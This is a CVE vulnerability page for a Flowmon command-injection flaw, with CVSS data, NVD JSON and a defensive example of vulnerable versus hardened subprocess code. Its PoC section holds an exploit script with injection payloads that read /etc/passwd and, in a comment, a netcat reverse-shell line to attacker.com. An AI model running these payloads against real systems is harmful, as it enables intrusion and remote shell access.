Security Vulnerability Report
CVE-2025-10239 CVSS 7.2 HIGH

CVE-2025-10239

Published: 2025-10-09 13:15:32
Last Modified: 2026-04-15 00:35:42

Description

In Flowmon versions prior to 12.5.5, a vulnerability has been identified that allows a user with administrator privileges and access to the management interface to execute additional unintended commands within scripts intended for troubleshooting purposes.
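The record classifies this as CWE-78 (OS command injection): an administrator-supplied value reaches a shell inside a troubleshooting script without being constrained to the value the script expects. The advisory names neither the script nor the parameter, so the following is an added example, not Flowmon code or the vendor's fix: a hypothetical diagnostic wrapper written both the vulnerable way (string interpolation into a shell command) and the hardened way (allow-list validation plus an argv list with no shell). `echo` stands in for a tool such as traceroute so the block runs offline; the payloads are constructed to match the kinds the PoC on this page tries.

```python
import re
import subprocess
from typing import List

# Hypothetical troubleshooting wrapper (not from the advisory): runs a network
# tool against an admin-supplied target. "echo" stands in for traceroute so the
# example runs offline; the shell behaviour being demonstrated is identical.
TOOL = "echo"

# Allow-list: a hostname or dotted IPv4 literal in RFC 1123 label grammar.
# No whitespace, no shell metacharacters, no leading "-" (blocks option injection).
_TARGET_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_run(target: str) -> str:
    """CWE-78 pattern: the target is interpolated into a command line that is
    handed to /bin/sh, so ';', '&&', '|', backticks and $() start extra commands."""
    cmd = f"{TOOL} {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_target(target: str) -> str:
    """Return the target if it matches the allow-list, else raise ValueError."""
    t = target.strip()
    if not _TARGET_RE.fullmatch(t):
        raise ValueError(f"rejected target: {target!r}")
    return t


def hardened_run(target: str) -> str:
    """Fixed pattern: the validated value is one argv element and no shell is
    involved, so even a validation bypass would deliver metacharacters to the
    tool as literal characters rather than as command separators."""
    argv: List[str] = [TOOL, validate_target(target)]
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


# Constructed payloads of the kinds the PoC on this page tries.
PAYLOADS = [
    "127.0.0.1; echo INJECTED",
    "127.0.0.1 && echo INJECTED",
    "127.0.0.1 | echo INJECTED",
    "`echo INJECTED`",
    "$(echo INJECTED)",
]


def compare(payload: str) -> dict:
    """Run one payload through both paths and report what each did."""
    result = {"vulnerable_injected": "INJECTED" in vulnerable_run(payload)}
    try:
        hardened_run(payload)
        result["hardened"] = "ran"
    except ValueError as exc:
        result["hardened"] = str(exc)
    return result


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:32} -> {compare(p)}")
```

Every payload produces the injected marker through `vulnerable_run` and is rejected before execution by `hardened_run`; a legitimate target such as `127.0.0.1` passes through unchanged. The argv form is the important half of the fix: validation alone is brittle, but with `shell=False` there is no shell to interpret separators even when validation is wrong.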

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available from NVD for this record (vulnStatus: Deferred). The affected range stated in the description is:

Progress Flowmon < 12.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10239 - Flowmon command injection PoC
# Vulnerability: OS command injection (CWE-78) in troubleshooting scripts
# Affected: Flowmon versions prior to 12.5.5
# Required: administrator privileges on the Flowmon management interface
#
# NOTE: the advisory does not name the affected script, endpoint or parameter.
# The URL paths and JSON field names below are assumptions for illustration
# and have to be adapted to the real management API before use.

import sys

import requests
import urllib3

# Appliances commonly use self-signed certificates; silence the verify=False warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target configuration
TARGET_URL = "https://target-flowmon.example.com"
USERNAME = "admin"
PASSWORD = "password123"

# Step 1: Authenticate to the Flowmon management interface
# (login endpoint and payload layout are assumed, not taken from the advisory)
session = requests.Session()
login_url = f"{TARGET_URL}/api/auth/login"
login_payload = {"username": USERNAME, "password": PASSWORD}

response = session.post(login_url, json=login_payload, verify=False)
if response.status_code != 200:
    print("[!] Authentication failed")
    sys.exit(1)
print("[*] Authenticated successfully")

# Step 2: Inject a command via a troubleshooting script parameter
# The weakness is that a script parameter reaches the OS shell without
# being validated. Endpoint and field names are assumed.
troubleshoot_url = f"{TARGET_URL}/api/diagnostics/execute"

# Malicious payload: append extra commands after a semicolon separator.
# Normal input would be a hostname such as "target.example.com".
injected_payload = {
    "script": "traceroute",
    "target": "127.0.0.1; id; whoami; cat /etc/passwd",
}

response = session.post(troubleshoot_url, json=injected_payload, verify=False)
print(f"[*] Response status: {response.status_code}")
print(f"[*] Response body: {response.text}")

# Alternative injection vectors to test if ';' is filtered:
# target = "127.0.0.1 && cat /etc/passwd"
# target = "127.0.0.1 | nc attacker.com 4444 -e /bin/sh"
# target = "127.0.0.1`whoami`"
# target = "$(cat /etc/passwd)"

print("[*] Command injection attempt completed")

References

https://community.progress.com/s/article/CVE-2025-10239 (vendor advisory, as listed in the NVD record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10239", "sourceIdentifier": "[email protected]", "published": "2025-10-09T13:15:31.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Flowmon versions prior to 12.5.5, a vulnerability has been identified that allows a user with administrator privileges and access to the management interface to execute additional unintended commands within scripts intended for troubleshooting purposes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://community.progress.com/s/article/CVE-2025-10239", "source": "[email protected]"}]}}